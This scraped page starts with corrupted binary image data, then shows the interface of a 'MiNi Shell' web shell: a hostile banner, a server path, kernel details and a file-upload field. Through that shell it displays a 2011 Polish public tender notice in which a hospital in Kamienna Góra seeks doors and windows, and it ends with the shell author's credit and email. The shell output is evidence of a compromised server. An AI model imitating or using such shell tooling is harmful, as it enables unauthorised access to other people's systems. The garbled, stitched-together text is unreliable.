JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111221/340247-N-2011.html

<p class="kh_header"><b>Kamienna Góra: dostawa stolarki okiennej drzwiowej i okiennej</b><br>
<b>Numer ogłoszenia: 340247 - 2011; data zamieszczenia: 21.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o.o. Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy , ul. Bohaterów Getta 10, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 7449033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcz.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa stolarki okiennej drzwiowej i okiennej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o. o. Niepubliczny Zakład Opieki Zdrowotnej Szpital  Powiatowy zaprasza do udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego nr 22/2011  na dostawę   stolarki drzwiowej   dla  PCZ w Kamiennej Górze Sp. z o. o . NZOZ Szpitala Powiatowego.
 
 CPV:  44.22.00.00-8 (stolarka budowlana); 44.22.10.00-5 - okna, drzwi, podobne elementy 44.22.10.00-5

          Przedmiotem zamówienia    jest dostawa stolarki drzwiowej i okiennej aluminiowej oraz PCV  dla PCZ w Kamiennej   Górze Sp z o. o.  NZOZ Szpital Powiatowy przy ul. Bohaterów Getta 10 w ilości:
26 szt drzwi aluminium,
2 szt witryn z drzwiami (prawo-lewo) aluminiowe,
1 kpl witryn aluminiowych,
okna PCV 1 szt,
witryna PCV i drzwi PCV 1 szt.   
Zamawiana stolarka ma wymiary niestandardowe jak na załączonych rysunkach technicznych.  Dostawa nie obejmuje demontażu,  wykucia, rozbiórki  czy montażu. Zamawiana stolarka winna być w tonacji RAL: 3018. 
        Opis stolarki okiennej PCV:

okna nietypowe, w profilach białych, pięciokomorowe zapewniające odpowiednią wytrzymałość skrzydła okiennego, białe od wewnątrz i od zewnątrz z okuciami obwiedniowymi, rozwiernymi i rozwierno - uchylnymi; dla skrzydeł RU mikrowentylacja. Zastosowane do skrzydeł okucia (R, Ru, U) muszą posiadać pełną regulację tj. strona zawiasów: regulacja pionowa i pozioma skrzydła, dla skrzydeł RU zastosować blokadę przeciw niewłaściwej obsłudze,
wzmocnienia stalowe ocynkowane we wszystkich profilach głównych, o przekrojach ściśle wg dokumentacji systemowej dostawcy profili oraz aprobaty ITB. Profile w najwyższej klasie wytrzymałości A o grubości ścianek wewnętrznych >= 2,8 mm, 
nawiewniki  zgodnie z normą PN-83/B-03430 wentylacja  jak w budynkach mieszkalnych, zamieszkania zbiorowego i użyteczności publicznej, ze zmianami Pr PN-B-03430/Az3 z lutego 2000r.  oraz aktualnymi warunkami technicznymi, jakim powinny odpowiadać budynki i ich usytuowanie (będących podstawowym aktem prawnym dla nadzoru budowlanego) komplet nawiewników w oknie musi zapewnić maksymalny przepływ od 20 do 50 m3/h oraz współczynnik infiltracji powinien wynosić <0,30m3/(mhdaPa2/3),
wyroby powinny mieć wysoko elastyczną uszczelkę z mikrogumy o profilu pełnym i zamkniętym, która powinna zapewnić po zamknięciu odpowiednią szczelność i redukcję hałasu a jednocześnie zapobiegać wnikaniu do pomieszczenia zimnego powietrza, wody, pyłków, dźwięków i zapachów 
uszczelki kolor biały, szary lub czarny, 
klamki: wysokiej klasy klamki okienne o nazwie: HOPPE SECUSTIC- dowolny model lub inne o nie gorszych parametrach technicznych,
szyby podwójne 4/16/4 - zespolone, typu FLOAT, U<=1,1 spełniające wymagania PN  BN-89/6821 - 02,
mają posiadać wymagane  atesty, aprobaty, deklaracje, certyfikaty ITB zezwalające na stosowanie w obiektach użyteczności publicznej, 
kotwy stalowe elastyczne do montażu zestawów stolarki,
pianka poliuretanowa do uszczelnień.
Opis stolarki drzwiowej:
         Zgodnie z obowiązującymi przepisami do sal chorych, gabinetów zabiegowych i pokoi badań należy stosować drzwi specjalistyczne stosowane w szpitalach i ośrodkach zdrowia. Konstrukcja i powierzchnia drzwi powinna zapewniać bezproblemowe stosowanie środków chemicznych zapewniających utrzymanie drzwi w wymaganej przepisami sanitarnymi czystości. Drzwi do sal chorych powinny w górnej części mieć zamontowaną szybę matową,  bezpieczną, pozwalającą na doświetlenie korytarza. Szyba powinna być zamontowana w sposób wykluczający jej wypadnięcie, pęknięcie lub rozbicie podczas użytkowania drzwi. Klamki w drzwiach powinny zapewniać łatwość ich otwierania przez osoby o ograniczonej motoryczności. Uszczelki powinny zapewniać ciche i łatwe domykanie drzwi.
Drzwi w sanitariatach, powinny być odporne na działanie wilgoci, łatwe w utrzymaniu czystości. W dolnej
części powinny posiadać kratki lub otwory nawiewne. Wszystkie drzwi powinny otwierać się na całą
szerokość (kąt 180°), tak, aby po otwarciu nie zwężać drogi ewakuacyjnej na korytarzu.
Transport stolarki drzwiowej powinien odbywać się zgodnie z zaleceniami producenta. 
Przestrzenie załadowcze środków transportowych powinny być czyste. Płaszczyzny ścian i podłóg nie powinny mieć wystających gwoździ oraz ostrych elementów mogących powodować uszkodzenie elementów.  Okna i drzwi należy ustawiać  w  jednej warstwie, pionowo w rzędach tak, aby płaszczyzny skrzydeł były  równoległe do podłużnej osi pojazdu, z tym że okna - na progach ościeżnic, drzwi - na stojakach ościeżnic. 
 Kierunek otwierania  stolarki  przedstawiono na rysunkach technicznych i szkicach. 

Termin  dostawy towaru: 7 dni od daty zawarcia umowy.
Wykonawca zapewni minimalny termin płatności: 30 dni od dnia dostawy towaru i doręczenia  faktury Vat.
Dostawa towaru będzie się odbywać na koszt i ryzyko transportem dostawcy. 
Wykonawca  udzieli gwarancji  na w/w stolarkę bez montażu min. - 12 miesięcy. 


UWAGA: 
Wymiary podane przez Zamawiającego mogą się różnić w  związku z  tym prosimy dokonać własnego pomiaru.  Przed ostatecznym wykonaniem stolarki należy sprawdzić z natury  wymiary wszystkich otworów i uzgodnić z Zamawiającym wszystkie wymiary,wielkość, podział, ostateczną  ilość, rodzaj, kolorystykę, funkcjonalność. 
Należy pamiętać, że rysunki techniczne są elementem pomocniczym, a nie podstawowym do wyceny.   Wykonawca może sporządzić  kosztorys lub przedmiar czy ST na własne potrzeby. Zamawiający nie wymaga ich sporządzenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 44.22.00.00-8, 44.22.10.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- wyrażające się tym, że jako wykonawca   brał udział  w co najmniej 1 dostawie (odpowiadającej swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia  z  podaniem ich wartości, przedmiotu, dat wykonania i odbiorców) wykonanych (zakończonych) lub wykonywanych  wraz z dokumentami (referencjami), z których wynikać musi, że dostawy te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">atesty  oraz aprobaty, deklaracje, certyfikaty ITB zezwalające na stosowanie w obiektach użyteczności publicznej</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>załączniki: 
 
1.1 formularz ofertowy 

1.2 oświadczenie oferenta

1.3 oświadczenie w sprawie stosowania się do siwz 

1.4        formularz upoważnienia do podpisania oferty 

1.5        formularz cenowy  

1.6         projekt  umowy 

1.7        podwykonawcy 
1.8       oświadczenie oferenta o spełnianiu warunków udziału w postępowaniu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>-   wystąpi siła wyższa mająca wpływ na realizację umowy,

-  zaistnieje omyłka pisarska lub rachunkowa,

-   nieistotne zmiany umowy, 

-   zachodzi konieczność zmiany terminu  wykonania przedmiotu zamówienia, w przypadku, gdy nie można było tego  
     przewidzieć w chwili podpisania umowy,

-  niezbędna jest zmiana sposobu wykonania zobowiązania, o ile zmiana taka jest korzystna dla Zamawiającego lub jest  
    konieczna w celu prawidłowego wykonania umowy

-  jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację 
    przedmiotu zamówienia, a w szczególności w przypadku ustawowej zmiany podatku VAT,

-  zachodzi konieczność zmiany w zakresie podwykonawstwa,  o ile nie jest to sprzeczne z postanowieniami SIWZ,

-  możliwa jest korzystna dla Zamawiającego zmiana terminu i sposobu płatności za realizację przedmiotu zamówienia,

- nastąpiła zmiana danych Wykonawcy  w tym min. formy organizacyjno - prawnej,

-  zmiana rachunku bankowego i innych danych stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcz.org.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWE CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  Sp. z o. o.
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
58-400 Kamienna Góra, ul. Bohaterów Getta 10, woj. dolnośląskie 
dział zam. publ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.01.2012 godzina 10:00, miejsce: POWIATOWE CENTRUM ZDROWIA W KAMIENNEJ GÓRZE  Sp. z o. o.
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
58-400 Kamienna Góra, ul. Bohaterów Getta 10, woj. dolnośląskie 
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com